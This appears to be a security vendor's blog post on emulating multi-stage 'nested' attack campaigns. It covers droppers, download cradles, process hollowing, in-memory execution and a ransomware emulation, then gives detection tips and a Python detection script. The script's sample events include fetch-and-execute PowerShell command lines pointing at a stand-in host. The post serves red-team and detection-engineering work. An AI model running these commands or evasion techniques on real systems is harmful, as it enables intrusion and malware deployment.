Threat Thursday: Emulating Nested Campaigns in SCYTHE

In a recent Threat Thursday Live session, the team at SCYTHE delved into a recurring question from users and workshop attendees: How do you emulate nested campaigns, especially in scenarios involving droppers and second-stage payloads? Whether you're using SCYTHE or another command-and-control (C2) framework, this guide walks you through several techniques that simulate threat actors launching secondary implants or campaigns.

What Are Nested Campaigns?

Nested campaigns mimic a realistic threat scenario where a primary payload (often referred to as a "dropper") launches additional payloads. This approach reflects how adversaries limit each component’s functionality for stealth and evasion. Rather than having a single implant carry out an entire attack chain, tasks are split among multiple binaries or scripts.

This method:

  • Distributes malicious actions across multiple payloads.
  • Obscures attribution by breaking direct ties between initial access and final impact.
  • Adds realism to red team engagements and detection engineering exercises.


Emulating Droppers in SCYTHE

In the session, five core techniques were demonstrated to emulate these behaviors using SCYTHE’s capabilities.

1. Ingress Tool Transfer via C2

Method: Using SCYTHE’s virtual file system (VFS), a prebuilt executable (drop.exe) is transferred to the target machine via an existing C2 channel.

Execution: The executable is stored in the user's Downloads folder and executed using PowerShell.

Detection Tip: Because the file is pulled over the already-established C2 channel, no separate download connection is generated, which makes this variant harder to detect with conventional download monitoring such as proxy or web-filter logs.

2. WGET Cradle with Direct Download Link

Method: Utilizing a direct download link generated in SCYTHE, the dropper binary is retrieved with PowerShell’s wget alias (Invoke-WebRequest) and then executed.

Customization: These links can point to EXE, DLL, or client/hosted files, depending on your campaign's needs.

3. Hosting Executables in the Public VFS

Method: Instead of direct download links, the binary is hosted in the public-facing VFS directory.

Benefit: Allows file staging externally and mimics use of redirectors or compromised web servers. You can further disguise your download origin or pre-process the file with obfuscation tools like Donut.

4. Process Hollowing

Method: The downloaded campaign (converted into shellcode) is injected into a legitimate process (e.g., calc.exe), using process hollowing.

Why It Matters: This technique helps evade detection by making malicious activity appear to originate from a benign process.

Detection Tip: Look for suspicious parent-child relationships (e.g., calc.exe unexpectedly launching PowerShell or another implant).

5. In-Memory Execution of PowerShell Scripts

Method: Use the Invoke-Expression (IEX) cmdlet to run scripts like SharpHound.ps1 directly from memory, avoiding disk writes.

Hosting: Scripts are hosted in the public VFS and pulled into the PowerShell session via HTTP.

Detection Tip: While command-line arguments are still logged, the script itself isn’t written to disk, requiring memory inspection or behavioral analysis for detection.

Bonus: Script Execution via UpShell

Method: A PowerShell script hosted in the VFS performs a wget download and starts the dropped process, all driven from UpShell (unmanaged PowerShell), which further reduces visibility.

Detection Consideration: Only the dropped file is written to disk; the command execution and download activities are often invisible to script block logging and process creation logs.

Real-World Application: Simulating Double-Extortion Ransomware

The team also demonstrated a small ransomware emulation as the dropped campaign:

  • Creates a directory named ransom.
  • Populates it with dummy files.
  • Compresses and uploads them.
  • Encrypts the local copies, emulating double-extortion tactics used by modern ransomware groups.

Detection Engineering Tips

Detection efforts should focus on:

  • File Creations by PowerShell/CMD. Monitoring these can surface suspicious droppers.
  • Command-Line Arguments. Look for unusual use of wget, IEX, or PowerShell re-invocation.
  • Process Trees. Tools like Splunk’s PSTree plugin or EDR platforms help visualize suspicious process hierarchies (e.g., PowerShell → Dropper → Calc.exe → PowerShell).
  • Anomalous Behavior from Common Binaries. Applications like calc.exe or chrome.exe should not spawn multiple child processes.
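The parent-child check from the process hollowing detection tip and the four focus areas above can be turned into concrete detection logic. The following is an added example written for this article, not SCYTHE's code or anything shown in the session: it runs over constructed Sysmon-style process-creation records (pid, parent pid, image path, command line; the sample events, paths and URL are made up) and reproduces the PowerShell → Dropper → Calc.exe → PowerShell chain described above alongside a benign browser chain, so you can see which rules fire and which stay quiet. The rule names, the BENIGN_LEAVES set and the thresholds are assumptions you would tune to your own environment.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real logs): fields mirror what a Sysmon
# Event ID 1 or EDR process-creation record carries. Hostnames and paths are invented.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Benign chain: a browser forking a same-image renderer child.
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},
    {"pid": 201, "ppid": 200, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --type=renderer"},
    # Nested-campaign chain from the post: PowerShell -> dropper -> calc.exe -> PowerShell.
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "wget http://staging.example/drop.exe -OutFile drop.exe"'},
    {"pid": 301, "ppid": 300, "image": r"C:\Users\alice\Downloads\drop.exe", "cmdline": "drop.exe"},
    {"pid": 302, "ppid": 301, "image": r"C:\Windows\System32\calc.exe", "cmdline": "calc.exe"},
    {"pid": 303, "ppid": 302, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -c "IEX $stage2"'},
    {"pid": 304, "ppid": 302, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"pid": 305, "ppid": 303, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-Process"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELLS = {"powershell.exe", "pwsh.exe"}
# Assumed set of user applications that have no business launching a shell or a second implant.
BENIGN_LEAVES = {"calc.exe", "chrome.exe", "notepad.exe", "mspaint.exe"}
# Download-cradle / in-memory execution tokens named in the post. wget and iwr are
# PowerShell aliases of Invoke-WebRequest; IEX is the alias of Invoke-Expression.
CRADLE_RE = re.compile(r"\b(wget|iwr|Invoke-WebRequest|IEX|Invoke-Expression)\b", re.IGNORECASE)


def basename(image):
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return PureWindowsPath(image).name.lower()


def build_tree(events):
    """Index events by pid and by parent pid so the tree can be walked both ways."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    return by_pid, children


def ancestry(pid, by_pid):
    """Chain of image names from the oldest known ancestor down to pid, for the analyst."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # seen-set guards against pid reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " -> ".join(reversed(chain))


def detect(events):
    """Apply the detection rules and return (rule, pid, chain) tuples."""
    by_pid, children = build_tree(events)
    hits = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else None
        chain = ancestry(e["pid"], by_pid)

        # Rule 1: a benign user application spawning a shell (calc.exe -> powershell.exe).
        if pname in BENIGN_LEAVES and name in SHELLS:
            hits.append(("suspicious_child", e["pid"], chain))
        # Rule 2: download-cradle or in-memory execution tokens on the command line.
        if CRADLE_RE.search(e["cmdline"]):
            hits.append(("cradle_cmdline", e["pid"], chain))
        # Rule 3: PowerShell re-invoking PowerShell.
        if name in POWERSHELLS and pname in POWERSHELLS:
            hits.append(("powershell_reinvocation", e["pid"], chain))
        # Rule 4: a shell launching an executable out of a Downloads folder (the drop.exe pattern).
        if pname in SHELLS and "\\downloads\\" in e["image"].lower():
            hits.append(("downloads_exec", e["pid"], chain))
        # Rule 5: a benign application with two or more children of a *different* image.
        # Same-image children are ignored because browsers legitimately fork renderers.
        if name in BENIGN_LEAVES:
            foreign = [c for c in children[e["pid"]] if basename(c["image"]) != name]
            if len(foreign) >= 2:
                hits.append(("noisy_benign_binary", e["pid"], chain))
    return hits


if __name__ == "__main__":
    for rule, pid, chain in detect(EVENTS):
        print(f"{rule:24} pid={pid:<4} {chain}")
```

Against the sample, the browser chain produces no alerts, while every link of the nested chain is caught at least once: the wget and IEX command lines, drop.exe running from Downloads under PowerShell, calc.exe spawning both a shell and cmd.exe, and the final PowerShell re-invocation. Rule 5 is deliberately restricted to children with a different image so that multi-process applications do not generate noise; the ancestry string is what you would surface in the alert so the analyst sees the whole PowerShell → Dropper → Calc.exe → PowerShell hierarchy rather than a single event.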

Final Thoughts

This walkthrough highlights just a few ways to simulate nested campaigns, from overt to highly stealthy techniques. While demonstrated using SCYTHE, many of these approaches are applicable across other platforms like Cobalt Strike, Empire, or custom tooling.